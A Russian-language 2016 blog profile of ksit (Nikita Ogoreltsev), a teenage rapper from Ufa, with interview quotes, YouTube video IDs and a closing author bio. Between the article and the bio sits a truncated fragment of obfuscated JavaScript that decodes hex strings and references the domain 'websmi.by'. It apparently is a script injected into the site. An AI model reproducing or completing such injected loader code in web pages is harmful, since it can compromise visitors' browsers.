Музыкальный вкус молодежи 2К16 года весьма специфичен…

Как часто от взрослых мы слышим осуждения вроде: «Вот какая молодежь нынче пошла, ужас какой-то…». А некоторые еще и начинают пресловутый рассказ «А вот в наше время…».

Люди, которые родились во времена печатных машин и голубиной почты, считают, что из молодежи, воспитываемой бездушной техникой и инновациями ничего толкового не выйдет. Еще среди старшего поколения вошло в моду считать, что все свободное время мы – современная молодежь, проводим в компьютере и других жизненно необходимых нам гаджетах. Что вывези нас на природу – потеряемся в трех соснах со своими навигаторами. И музыка у нас, видите ли, не такая как в их «лихое» время: «Одни туц-туц и тыц-тыц, никакого разнообразия!». Неужели многие и вправду думают, что спустя 20 лет песни Сердючки и Газманова останутся популярными? Может тексты их песен и останутся навсегда в памяти у людей, родившихся в момент пика их славы. Но я не думаю, что современная молодежь будет веселиться на дискотеке под «Хорошо, все будет хорошо» Веры Сердючки. Если бы взрослые хоть немного уделяли внимания творческим данным своего чада, а не только его учебе, то можно было бы  заметить, что кругом полно талантливых ребят, у которых просто нет возможности пробиться на мировую арену. Вы даже представить себе не можете сколько конкурентов было бы у Валерия Меладзе, если бы все  творцы музыки нашего времени имели хотя бы начальный капитал, от которого могли бы отталкиваться, двигаясь вверх по карьерной лестнице.

Насчет творцов музыки нашего времени, совсем недавно мне выпала возможность познакомится с молодым российским исполнителем – Никитой Огорельцевым, которого некоторые из вас могут знать под псевдонимом ksit. На первый взгляд – обычный семнадцатилетний житель Уфы, ученик средней школы, но кое-чем он все-таки отличается от сверстников.

ntMPiKNStzA

31 мая 2015 года, на свой семнадцатый день рождение Никита записал свой первый трек. Тексты своих песен юный артист пишет сам и как оказалось, все они связаны с определенными событиями в его жизни, и к сожалению, не самыми яркими и красочными:

-Я не могу писать просто так, что-то выдумывать, в основном мысль зарождается, когда со мной происходит что-то плохое, то, что может выбить меня из привычного ритма жизни.
Когда пишу, в голове кружится тысяча воспоминаний о том, что было и мыслей о том, что происходит со мной сейчас, в отношениях, дружбе, неважно. Во все тексты я вкладываю душу,
стараюсь сделать песню с эмоциями и не только для себя, а для того, чтобы она была понятна всем или какому-то определенному человеку.

Первый трек Никиты стал его пропуском в мир музыки, никто не ожидал такого от новоиспеченного исполнителя. Однако с того времени прошло немало времени и Ksit решил не зацикливаться на одном стиле исполнения и двигаться дальше:

— Я разносторонний исполнитель и готовлю мощный альбом, в стиле недавно вышедшего трека «Космос», для меня в данный момент он является одним из лучших. Буду стараться все делать аккуратно и осмысленно, без лишней воды.

Свои песни, как и многие знаменитые исполнители, Никита начал писать из-за бывшей девушки. Изначально он даже не думал продолжать начатое, все вышло спонтанно и теперь Ksit радует нас все новыми и новыми треками:

SRM8JwrXSy0

— Есть множество других исполнителей, стиль исполнения которых схож, такой же эмоционально тяжелый, та же группа Найтивыход, о которой я узнал не так давно. Я лично знаком с Кириллом (солистом группы)  и считаю, что он очень хорош в своем деле и на много опытнее меня. Мне повезло сотрудничать с многими талантливыми ребятами и не только из моего города, например группа nedonebo, с которой у нас есть пару совместных композиций. Сначала никакого результата от музыки я не получал  и даже не задумывался о какой-то выгоде, я двигался в тиши.

Осенью Никиту заметил известный тусовщик и репер Уфы. Спустя какое-то время он предложил юному Ksityсовместно записаться, говоря о том, что он очень хорош в плане музыки, хотя сам Никита так не считал, на тот момент у него было 3 трека, которые на его взгляд были недостаточно хорошими. Затем компания выросла  до  4 друзей и начала по-тихоньку двигаться и давать выступления в клубах города. И вот уже в октябре , когда Никита готовил свой новый альбом, в котором было 4 трека, один из них попал на международное радио.

Уже позже стиль начал меняться, если раньше была просто лирика , то сейчас композиции стали намного сильнее и эмоциональнее. Был выпущен альбом «Малиновый», после которого создателю начали поступать многочисленные предложения о совместной записи:

3jnXNsNH9ig

-Сейчас я работаю над самым сильным на данный момент альбомом и стараюсь не отходить от темы , хоть это и сложно, так как проблем по мимо музыки — куча.

u9YzKtD0fqY

Во время записи своего первого трека Никита никак не мог придумать себе творческий псевдоним, перед релизом неделю ломал голову, рисовав в paint английские буквы и случайно написал ksiti. Когда пришло время выкладывать свое первое творение в сеть нужно было решаться и он сократил случайный набор букв и подписался как «Никита ksit»:

-Что насчет планов на дальнейшее творчество: буду двигаться, организовывать концерты, а пока пишу треки, когда есть время, стараюсь выложиться на все сто, раскрыть душу и порадовать людей, которые это слушают.
Из всех исполнителей, видеоблоггеров и других талантливых личностей, с которыми мне довелось общаться, Никита Огорельцев один из не многих, кто собирается заниматься учёбой и поступать в высшее учебное заведение, а не надеяться на своё хобби:

-Конечно я буду поступать, правда еще пока не знаю куда. Музыкой ты себя не прокормишь. Ты ведь сразу не станешь популярным и каждый день концерты давать не будешь, все придется начинать с нуля. Дело именно в том,  что музыка – это хобби, а не работа. Нужно объективнее  относиться к вещам и жить реальностью, а не в мечтах и планах.

Треки Никиты действительно специфичны, не многие смогут оценить глубину чувств, вложенных в написанный текст, не многие увидят ту тонкую грань, которая отделяет исполнителя от его произведения и не многие смогут понять смысл песни:

— Для каждого исполнителя главное иметь слушателей, которые скажут что лучше исправить, что вообще переписать. Люди слушают меня, дают какие-то советы и я это ценю.

Никита Огорельцев является не единственным примером того, что нашему поколению тоже есть кем гордиться. Впереди еще много вершин, которые ему придется покорить, продвигая свою музыку, но люди, у которых есть цель – способны на многое. Не изменяйте своим мечтам, творите историю.

s95wW77fBFQ

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "websmi.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Savich Karina

Меня зовут Карина, ну, а если официально, то: Савич Карина Юрьевна. Мне 16 лет, учусь в 11 классе и собираюсь поступать...*барабанная дробь*... в институт журналистики! В плане характера- спокойная и общительная, легко могу подобрать ключик к любому человеку, в плане работы- ответственная, иногда даже слишком, если нужно что-то сделать- сделаю, даже если это отнимет у меня массу времени и сил- я все равно добьюсь желаемого результата. Обладаю организаторскими качествами. Уже с раннего возраста близкие начали замечать за мной повадки будущего журналиста: поздними вечерами, в своей комнате, я устраивала теле- и радиостудию, и в прямом эфире брала интервью у своих игрушек. Уже в младших классах я писала небольшие рассказы и сказки, которые учительница всегда ставила в пример. В старшей школе я стала лучшим другом нашего педагога-организатора. Я не помню ни одного школьного концерта, который бы прошел без меня. Я принимаю участие не только в школьных, но и районных, и даже городских конкурсах, в которых нужно показать себя, свой талант. Также играю в школьной лиге КВН, наша команда выходит на городской уровень, где занимает призовые места. Этим летом едем покорять мир!

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *